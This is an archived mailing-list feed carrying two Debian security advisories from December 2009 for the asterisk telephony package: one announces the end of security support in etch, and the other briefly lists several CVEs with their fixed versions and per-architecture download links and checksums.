&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Steffen Joeris
&lt;br&gt;December 15, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: asterisk
&lt;br&gt;&lt;br&gt;Security support for asterisk, an Open Source PBX and telephony toolkit,
&lt;br&gt;has been discontinued for the oldstable distribution (etch).
&lt;br&gt;The current version in oldstable is not supported by upstream anymore
&lt;br&gt;and is affected by several security issues. Backporting fixes for these
&lt;br&gt;and any future issues has become unfeasible and therefore we need to
&lt;br&gt;drop our security support for the version in oldstable. We recommend
&lt;br&gt;that all asterisk users upgrade to the stable distribution (lenny).
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26797080&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAksniaEACgkQ62zWxYk/rQcCcwCgigVQZXQlWppjqlX9emMHDrIn
&lt;br&gt;1qAAn2tZkODZpn+aHFtxylMZJYoWE54S
&lt;br&gt;=aJJU
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1952-2--End-of-life-announcement-for-asterisk-in-oldstable-tp26797080p26797080.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26797347</id>
	<title>[SECURITY] [DSA 1952-1] New asterisk packages fix several vulnerabilities</title>
	<published>2009-12-15T05:06:23Z</published>
	<updated>2009-12-15T05:06:23Z</updated>
	<author>
		<name>Steffen Joeris-3</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1952-1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26797347&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Steffen Joeris
&lt;br&gt;December 15, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: asterisk &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;Vulnerability &amp;nbsp;: several vulnerabilities
&lt;br&gt;Problem type &amp;nbsp; : remote &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;Debian-specific: no &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;CVE ID &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : CVE-2009-0041 CVE-2008-3903 CVE-2009-3727 CVE-2008-7220 CVE-2009-4055 CVE-2007-2383
&lt;br&gt;Debian Bug &amp;nbsp; &amp;nbsp; : 513413 522528 554487 554486 559103 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;&lt;br&gt;&lt;br&gt;Several vulnerabilities have been discovered in asterisk, an Open Source
&lt;br&gt;PBX and telephony toolkit. The Common Vulnerabilities and Exposures &amp;nbsp; &amp;nbsp; 
&lt;br&gt;project identifies the following problems: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;br&gt;&lt;br&gt;CVE-2009-0041
&lt;br&gt;&lt;br&gt;It is possible to determine valid login names via probing, due to the
&lt;br&gt;IAX2 response from asterisk (AST-2009-001).
&lt;br&gt;&lt;br&gt;CVE-2008-3903
&lt;br&gt;&lt;br&gt;It is possible to determine a valid SIP username, when Digest
&lt;br&gt;authentication and authalwaysreject are enabled (AST-2009-003).
&lt;br&gt;&lt;br&gt;CVE-2009-3727
&lt;br&gt;&lt;br&gt;It is possible to determine a valid SIP username via multiple crafted
&lt;br&gt;REGISTER messages (AST-2009-008).
&lt;br&gt;&lt;br&gt;CVE-2008-7220 CVE-2007-2383
&lt;br&gt;&lt;br&gt;It was discovered that asterisk contains an obsolete copy of the
&lt;br&gt;Prototype JavaScript framework, which is vulnerable to several security
&lt;br&gt;issues. This copy is unused and now removed from asterisk
&lt;br&gt;(AST-2009-009).
&lt;br&gt;&lt;br&gt;CVE-2009-4055
&lt;br&gt;&lt;br&gt;It was discovered that it is possible to perform a denial of service
&lt;br&gt;attack via &amp;nbsp;RTP comfort noise payload with a long data length
&lt;br&gt;(AST-2009-010).
&lt;br&gt;&lt;br&gt;&lt;br&gt;For the stable distribution (lenny), these problems have been fixed in
&lt;br&gt;version 1:1.4.21.2~dfsg-3+lenny1.
&lt;br&gt;&lt;br&gt;The security support for asterisk in the oldstable distribution (etch)
&lt;br&gt;has been discontinued before the end of the regular Etch security
&lt;br&gt;maintenance life cycle. You are strongly encouraged to upgrade to
&lt;br&gt;stable.
&lt;br&gt;&lt;br&gt;For the testing distribution (squeeze) and the unstable distribution
&lt;br&gt;(sid), these problems have been fixed in version 1:1.6.2.0~rc7-1.
&lt;br&gt;&lt;br&gt;&lt;br&gt;We recommend that you upgrade your asterisk packages.
&lt;br&gt;&lt;br&gt;Upgrade instructions
&lt;br&gt;- --------------------
&lt;br&gt;&lt;br&gt;wget url
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will fetch the file for you
&lt;br&gt;dpkg -i file.deb
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install the referenced file.
&lt;br&gt;&lt;br&gt;If you are using the apt-get package manager, use the line for
&lt;br&gt;sources.list as given below:
&lt;br&gt;&lt;br&gt;apt-get update
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will update the internal database
&lt;br&gt;apt-get upgrade
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install corrected packages
&lt;br&gt;&lt;br&gt;You may use an automated update by adding the resources from the
&lt;br&gt;footer to the proper configuration.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 5.0 alias lenny
&lt;br&gt;- --------------------------------
&lt;br&gt;&lt;br&gt;Debian (stable)
&lt;br&gt;- ---------------
&lt;br&gt;&lt;br&gt;Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;5295205 f641d1140b964e71e38d27bf3b2a2d80
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1984 69dcaf09361976f55a053512fb26d7b5
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 150880 ba6e81cd6ab443ef04467d57a1d954b3
&lt;br&gt;&lt;br&gt;Architecture independent packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.4.21.2~dfsg-3+lenny1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.4.21.2~dfsg-3+lenny1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;1897736 f0b7912d2ea0377bbb3c56cbc067d230
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.4.21.2~dfsg-3+lenny1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.4.21.2~dfsg-3+lenny1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 478858 b483c77c21df4ae9cea8a4277f96966a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.4.21.2~dfsg-3+lenny1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.4.21.2~dfsg-3+lenny1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 32514900 8d959ce35cc61436ee1e09af475459d1
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.4.21.2~dfsg-3+lenny1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.4.21.2~dfsg-3+lenny1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 427650 fb8a7dd925c8d209f3007e2a7d6602d8
&lt;br&gt;&lt;br&gt;alpha architecture (DEC Alpha)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 13039044 3fdf468968472853a921817681130898
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 393068 f6360d4fee30fd4e915ce6f381dd5e81
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2761948 017041bb2c755b0e404351134d40808a
&lt;br&gt;&lt;br&gt;amd64 architecture (AMD x86_64 (AMD64))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 397512 6f2936b9f76618b89c7994d094c372cf
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 13086704 ed835ac48b8b0fd614ebc960007b508b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2605278 dc7e3fe7307e402d8d59504c89434a84
&lt;br&gt;&lt;br&gt;arm architecture (ARM)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 12770542 6b450a1fcae626174db68a0ec9c831be
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 401766 fee883c4784ad9075da742d83f4baaa3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2510430 cd143e5ccf034d4eba145b2deabe87bd
&lt;br&gt;&lt;br&gt;armel architecture (ARM EABI)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_armel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_armel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 394588 d3e10caf1c6d790306701d9f34ac4fa4
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_armel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_armel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2540364 bb48863ea50a58f2358768c431fa1ca0
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_armel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_armel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 12840170 d02ebc2ddb92f53bcbd089bc4d41bd10
&lt;br&gt;&lt;br&gt;hppa architecture (HP PA RISC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 12871212 af107f8cc96f9b0b7030ec28a1967f13
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2780732 8534dd0bd7e9a46264357beeb692df19
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 412474 ac2070408bb67f325bd6ad7d3cbf032d
&lt;br&gt;&lt;br&gt;i386 architecture (Intel ia32)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2407006 2bbd456e2d36a734ac0789b6ff7e9d22
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 12937820 46acd420961efc6c932d94eec0452ad3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 388450 7c9e49cb8610a577d63f3fb77ecd92da
&lt;br&gt;&lt;br&gt;ia64 architecture (Intel ia64)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 13034554 8ca056f64fd91cc8597716834c894ce9
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 426588 9adc9d1948c77775cea4f248c7f261ae
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;3469020 6fcb11fa7b42f4cdce76c5c59a44b45c
&lt;br&gt;&lt;br&gt;mips architecture (MIPS (Big Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 381612 8373d46bc9e95e7f15821174f7432652
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 13433728 245c4ec2754177b5082d809733dc6e28
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2464570 6095542e8813aa8b64d025fe6c23697d
&lt;br&gt;&lt;br&gt;powerpc architecture (PowerPC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2806054 30cba312761b5b442ec3fbecf457e2c2
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 391488 ccb3c29a722a0a375aac06bd5937902c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 13267248 e867f0f519ddf844b366739c62a88869
&lt;br&gt;&lt;br&gt;sparc architecture (Sun SPARC/UltraSPARC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;2490436 434bf630723e57b97273291e780953c3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: 12742386 004d7b7016529815d21e2a086c20c718
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 389034 601d2368a23b3ee43385b8c28928ba24
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; These files will probably be moved into the stable distribution on
&lt;br&gt;&amp;nbsp; its next update.
&lt;br&gt;&lt;br&gt;- ---------------------------------------------------------------------------------
&lt;br&gt;For apt-get: deb &lt;a href=&quot;http://security.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/&lt;/a&gt;&amp;nbsp;stable/updates main
&lt;br&gt;For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26797347&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
